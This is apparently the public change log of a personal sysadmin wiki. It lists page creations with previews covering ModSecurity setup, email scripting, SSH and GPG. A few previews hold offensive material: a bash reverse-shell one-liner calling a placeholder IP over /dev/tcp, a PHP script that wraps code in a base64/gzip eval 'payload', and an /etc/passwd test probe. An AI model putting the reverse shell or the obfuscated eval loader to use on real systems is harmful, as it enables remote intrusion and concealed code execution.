Toggle menu
Toggle personal menu
Not logged in
Your IP address will be publicly visible if you make any edits.

All public logs

More actions

Combined display of all available logs of John's Wiki. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).

Logs
  • 19:22, 26 July 2024 Admin talk contribs created page Setting Up Libmodsecurity3, Nginx Connector, & OWASP Ruleset on Nginx (Created page with "= Setting Up Libmodsecurity3, Nginx Connector, & OWASP Ruleset on Nginx = thumb|none|alt=Logos|Logos == Background Info == Okay so tldr the modsecurity project recently back in January of 2024 switched hands from Trustwave SpiderLabs to the OWASP Foundation. [https://coreruleset.org/20240115/welcome-the-newest-addition-to-the-owasp-family-modsecurity/ More info here]. This transfer of stewardship means continued development of [https://github.c...")
  • 19:22, 26 July 2024 Admin talk contribs created page File:Testing modsec.png (testing mod security is configured properly and working by entering the query string ?test=/etc/passwd, should return a 403 if working!)
  • 19:22, 26 July 2024 Admin talk contribs uploaded File:Testing modsec.png (testing mod security is configured properly and working by entering the query string ?test=/etc/passwd, should return a 403 if working!)
  • 19:20, 26 July 2024 Admin talk contribs created page File:Fastfetch.png (Image of neofetch (aka now fastfetch) out for burner vm for mod sec on nginx post. Might be useful to someone to see kernel version or something :shrug:)
  • 19:20, 26 July 2024 Admin talk contribs uploaded File:Fastfetch.png (Image of neofetch (aka now fastfetch) out for burner vm for mod sec on nginx post. Might be useful to someone to see kernel version or something :shrug:)
  • 19:19, 26 July 2024 Admin talk contribs created page File:Logos.png (Image of mod security, OWASP, and Nginx Logos all together.)
  • 19:19, 26 July 2024 Admin talk contribs uploaded File:Logos.png (Image of mod security, OWASP, and Nginx Logos all together.)
  • 19:16, 26 July 2024 Admin talk contribs created page MediaWiki:Citizen-footer-tagline (Created page with " Don't forget your towel! <!-- MediaWiki:Citizen-footer-tagline -->")
  • 19:14, 26 July 2024 Admin talk contribs created page MediaWiki:Citizen-footer-desc (Created page with "A place for lost lovers... <!-- MediaWiki:Citizen-footer-desc -->")
  • 19:52, 17 July 2024 Admin talk contribs created page Apache2 Mod Security v2.9.7 Compilation Instructions (Created page with "== Overview == Going to be compiling <code>mod_security2</code> (v2.9.7) for Apache2 on Ubuntu 22.04. This module is pretty straight forward to compile. However, there are some dependencies. <pre>sudo apt install apache2-dev gcc libxml2 libxml2-dev libpcre3-dev</pre> Fetch the tarball from their github releases page. https://github.com/owasp-modsecurity/ModSecurity/releases/tag/v2.9.7 <pre>sudo su cd /opt wget https://github.com/owasp-modsecurity/ModSecurity/releases...")
  • 21:08, 18 May 2024 Admin talk contribs created page Using Iperf3 for Speed Testing (Created page with "Just found out about a cool little utility called <code>iperf3</code> for testing upload/download speeds between two hosts. On the server make sure to open the testing port on your firewall. Then run the following iperf3 command to start the server in your terminal. iperf3 -s -p 4000 I'm running it on port 4000. Then from the client machine you can run the following to test upload speeds. iperf3 -c SERVER_IP -p 4000 -t 10 If you stick a <code>-R</code> on there t...")
  • 17:31, 17 May 2024 Admin talk contribs created page Keeping Sensitive Data Out of Your Shells History File (Created page with "We've all been there before. <code>some_command</code> takes a flag for --password or --api_key. The lazy thing to do is just supply the password as part of your command. But there are two big downsides of doing that. First, it goes into your shell's history file and if you just leave it there someone could find it and use it to steal your bits! Second it goes into the process list and is potentially visible to other users on the system who are just viewing the process t...")
  • 01:09, 30 April 2024 Admin talk contribs created page Do cmd X times without a forloop (Created page with "Say you're in a weird shell and you don't know how to do a forloop. No worries! You can use seq | xargs to run some command any number of times. seq 5 | xargs -I {} echo fart")
  • 10:41, 13 April 2024 Admin talk contribs created page Japh (Created page with "A perl japh is an obfuscated perl program that prints out the message <code>Just another Perl Hacker</code> or <code>Just another Perl Programmer</code>. Here's my first ever attempt at creating a japh. <pre> #!/usr/bin/env perl # John's first japh! use MIME::Base64;use Compress::Zlib;$s='blue23';$p='japh';@k=split '',crypt($p,$s);%h=('1'=>'CEgt','Y'=>'CNk=','0'=>'UUjM','Q'=>'Ti0C ','w'=>'SEzO','l'=>'Ki0u','2'=>'SC1S','3'=>'yy/J','U'=>undef,'7'=> undef,'x'=>'ylHw','N'...")
  • 04:08, 11 April 2024 Admin talk contribs created page Encode.php (Created page with "Encodes a file as base64 gzip compressed payload file. <pre> <?php $input_file = 'info.php'; $output_file = 'x.php'; function removePhpTags($content) { $content = preg_replace('/^<\?php\s*/', '', $content); $content = preg_replace('/\s*\?>$/', '', $content); return $content; } $file_content = file_get_contents($input_file); $file_content = removePhpTags($file_content); $encoded = base64_encode(gzcompress($file_content)); $payload = "<?php eval(gzuncompress(base...")
  • 03:14, 31 December 2023 Admin talk contribs created page Virsh list all in json (Created page with "The following <code>bash</code> command will list all virsh guests in json. echo "[ $(virsh list --all|grep -Ev 'Id|----'|awk '{print "{ \"id\": \""$1"\", \"name\": \""$2"\", \"state\": \""$3 $4"\"}," }'|head -n -1) {} ]"|jq -r Output example: <pre> [ { "id": "38", "name": "Mac", "state": "running" }, { "id": "39", "name": "Dennis", "state": "running" }, { "id": "40", "name": "Charlie", "state": "running" }, ... </pre>")
  • 04:00, 14 December 2023 Admin talk contribs created page Loris.php (Created page with "Useful little PHP script for holding a connection open for testing. <pre> <?php // John testing holding a connection open, will clean up. Although I guess if // you're reading this that was a lie, sorry... Debug: ini_set('display_errors','1'); ini_set('display_startup_errors','1'); error_reporting (E_ALL); echo "Randomness Begin..."; function random_string($length) { $str = random_bytes($length); $str = base64_encode($str); $str = str_replace(["+", "/...")
  • 03:04, 2 December 2023 Admin talk contribs created page Inotifywait Shenanigans (Created page with "== Inotifywait == === Description === From the [https://linux.die.net/man/1/inotifywait man page]. <pre> NAME inotifywait, fsnotifywait - wait for changes to files using inotify or fanotify DESCRIPTION inotifywait efficiently waits for changes to files using Linux's inotify(7) interface. It is suitable for waiting for changes to files from shell scripts. It can either exit once an event occurs, or continually execute and output eve...")
  • 11:11, 7 October 2023 Admin talk contribs moved page Editing Bats - Bash Automated Testing System to Bats - Bash Automated Testing System (Misspelled title: Goofed when copying source from og wiki.)
  • 13:44, 4 October 2023 Admin talk contribs created page John's Wiki:Privacy policy (Created page with "Thank you for visiting [Your Wiki Website Name] (the "Website"). At [Your Wiki Website Name], we are committed to protecting your privacy and ensuring the security of your personal information. This Privacy Policy outlines our practices concerning the collection, use, and disclosure of your information. Please take a moment to review this policy carefully. Information We Collect Usage Information: We may collect non-personal information about how you use our Website, s...")
  • 13:17, 4 October 2023 Admin talk contribs created page John's Wiki:General disclaimer (Created page with "Do <span style="color:red">NOT</span> eat the <span style="color:yellow">yellow</span> snow!")
  • 12:34, 4 October 2023 Admin talk contribs created page Using the FTP CLI Utility (Created page with "To use the FTP command line utility run the command below. ftp example.com <pre> Connected to example.com. 220 ProFTPD Server (example.com FTP server) Name (example.com): YOUR_USERNAME 331 Password required for YOUR_USERNAME Password: 230 User YOUR_USERNAME logged in Remote system type is UNIX. Using binary mode to transfer files. </pre> * Then enable passive mode: <pre> ftp> passive Passive mode on. </pre> * You can list files with <code>ls</code...")
  • 12:23, 4 October 2023 Admin talk contribs created page Using Telnet with SMTP (Created page with "== The Old Way == To connect to a server using Telnet you would run the following command. telnet mail.example.com 25 However, you're not going to get very far. Unencrypted Telnet is a no-no for most mail servers and they'll cut you off right there. == Using OpenSSL to Connect Securely == Luckily, you can get around this by using the wonderful <code>openssl</code> tool/library to wrap your telnet session in a warm security blanket weaved from the finest encryption...")
  • 12:15, 4 October 2023 Admin talk contribs created page Using Telnet with IMAP (Created page with "== The Old Way == To connect to a server using just plain old telnet and IMAP you would run the following command. telnet mail.example.com 143 However, you're not going to get very far. Dovecote will not allow an insecure login so you're pretty much dead in the water. == Using OpenSSL to Connect Securely == Luckily, you can get around this by using the wonderful <code>openssl</code> tool/library to wrap your telnet session in a warm security blanket weaved from the...")
  • 12:04, 4 October 2023 Admin talk contribs created page Sending an Email with Python3 via smtplib (Created page with "It possible to use the module [https://docs.python.org/3/library/smtplib.html <code>smtplib</code>] to send an Email with python3. <pre> #!/usr/bin/env python3 import smtplib from email.message import EmailMessage to_addr = 'to@example.com' from_addr = 'from@example.com' mail_server = 'mail.example.com' passwd = 'YOUR_MAILBOX_PASSWORD' message = EmailMessage() message["To"] = to_addr message["From"] = from_addr message["Subject"] = 'Sent with Python & Smtpli...")
  • 11:53, 4 October 2023 Admin talk contribs created page Category:Sending an Email with... (Created blank page)
  • 11:53, 4 October 2023 Admin talk contribs created page Sending an Email with Perl via Sendmail (Created page with "If your system has a <code>sendmail</code> compatible MTA installed you can use it in conjunction with the Perl script below to send an Email using Perl. <pre> #!/usr/bin/env perl $to = 'to@example.com'; $from = 'from@example.com'; $subject = 'Sent with Perl and Sendmail'; $message = 'This is test email sent using Perl and Sendmail.'; open(MAIL, "|/usr/sbin/sendmail -t"); # Email Header print MAIL "To: $to\n"; print MAIL "From: $from\n"; print MAIL "Subject: $subj...")
  • 11:43, 4 October 2023 Admin talk contribs created page Sending an Email with Curl (Created page with "* Curl Command: curl -k smtps://mail.example.com \ --user "username:password" -v \ --login-options AUTH=PLAIN \ --mail-from you@example.com \ --mail-rcpt someone@example.com \ --upload-file /full/path/to/email.txt * Example <code>email.txt</code> To: someone@example.com From: you@example.com Subject: Sent With Curl This Email was sent with curl!")
  • 11:37, 4 October 2023 Admin talk contribs created page SSH Port Forwarding (Created page with "== Intro == It is possible to use SSH to take some port on machine A and redirect traffic to it securely through an encrypted tunnel to some other port on machine B. This is called SSH port forwarding and its a powerful yet niche usecase technique for redirecting ports when they may otherwise be inaccessible. == Example Use Case == Say we have two machines. We'll call them "server" and "client". Say on server, Apache is running on localhost port 80. However, server is...")
  • 11:27, 4 October 2023 Admin talk contribs created page IMAP Sync (Created page with "Imapsync is a command used to move mail from one mailbox to another. It literally logs into both mailboxes and uses the IMAP protocol to move mail from one mailbox into another. https://imapsync.lamiral.info/S/images/logo_imapsync.png * A sample <code>imapsync</code> command: imapsync --ssl1 --ssl2 --host1 mailserver1.com \ --user1="mailbox@domain.com" \ --host2 mailserver2.com \ --user2="mailbox@domain.com" --subscribe --fast Note: the above command uses the "\"...")
  • 11:19, 4 October 2023 Admin talk contribs created page Category:Python (Created blank page)
  • 11:18, 4 October 2023 Admin talk contribs created page How to Setup a Python Virtual Environment (Created page with "<h2>What is a Virtual Environment?</h2> Python, just like any programming language, has modules (aka, extensions, imports, includes, libraries, dependencies). These modules are just pre-written pieces of code, like functions and objects, that you can import into your project and use to extend the functionality and ease of use of the base language. Normally on your own computer you'd install modules globally at a system-wide level. The problem with depending on globally...")
  • 11:13, 4 October 2023 Admin talk contribs created page GPG Encryption (Created page with "= GPG - GNU Privacy Guard = == Overview == GPG is an alternative implementation of the OpenPGP standard. GPG/PGP uses asymmetric encryption to generate a public / private key pair. With asymmetric encryption, any data encrypted by the public key can only be decrypted by the private key and vice versa. The intention is to make your public key known and freely available while keeping your private k...")
  • 11:05, 4 October 2023 Admin talk contribs created page John's Wiki:About (Created page with "In the 1950s, therefore, the leaders of the Soviet Communist Party became thrilled about the new science of cybernetics, which by its nature seemed to translate into a language permeated with an aura of truth, correctness, objectivity – a language therefore perfectly fitting the socialist utopia. Evgeny Zamyatin had described it well in advance in his novel “We” (1920), which – as its translator Alessandro Niero writes – has been "baptised and renamed several...")
  • 10:42, 4 October 2023 Admin talk contribs created page Encoding vs Encryption vs Hashing (Created page with "Its easy to confuse these concepts as they are often used in conjunction with each other and mean similar things. However, each has a distinct technical meaning whose usage is applicable / not applicable in different contexts. Each method discussed below uses an algorithm to convert data from one format to another. However, these algorithms differ in the details of their functionality and their overall use cases. == Encoding == In a general sense, encoding means to tu...")
  • 10:29, 4 October 2023 Admin talk contribs created page Debugging Options (Created page with "== WordPress Debugging == Edit the site's '''wp-config.php''' file to enable WordPress debugging. define( 'WP_DEBUG', true ); define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); That will prevent errors from being displayed on the site and instead log them to a '''wp-content/debug.log''' file. == PHP Debugging == === Via .user.ini or php.ini === display_errors = on To log errors to a '''php-debug.log''' file use the following syntax instead....")
  • 09:58, 4 October 2023 Admin talk contribs created page Change Timezone (Created page with " ln -s /usr/share/zoneinfo/America/New_York /etc/localtime")
  • 09:57, 4 October 2023 Admin talk contribs created page Editing Bats - Bash Automated Testing System (Created page with "= Bash Automated Testing System = == Overview == Bats is a [https://testanything.org/ TAP-compliant] testing framework for Bash. It provides a simple way to verify that the UNIX programs you write behave as expected. A Bats test file is a Bash script with special syntax for defining test cases. Under the hood, each test case is just a function with a description. <pre>#!/usr/bin/env bats @test "addition using bc" { result="$(echo 2+2 | bc)" [...")
  • 09:50, 4 October 2023 Admin talk contribs created page Bash Reverse Shell Explanation (Created page with "A typical bash reverse shell payload looks like the following, where 1.1.1.1 is your IP address and 1234 is your netcat listener's port. bash -i >& /dev/tcp/1.1.1.1/1234 0>&1 But what the heck does all that mean? The following is my favorite explaination of how it works. <pre> &> file itself is the same as > file 2>&1, that is open file in write-only mode on file descriptor 1, and duplicate that file descriptor 1 to the file descriptor 2, so that both fd 1 and 2 (s...")
  • 09:46, 4 October 2023 Admin talk contribs created page Base 64 (Created page with "== On The Command Line == * To decode messages which are in Base 64 simply copy the content of the message into a text file. For example, lets decode the base 64 listed below. TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLC...")
  • 08:32, 4 October 2023 MediaWiki default talk contribs created page Main Page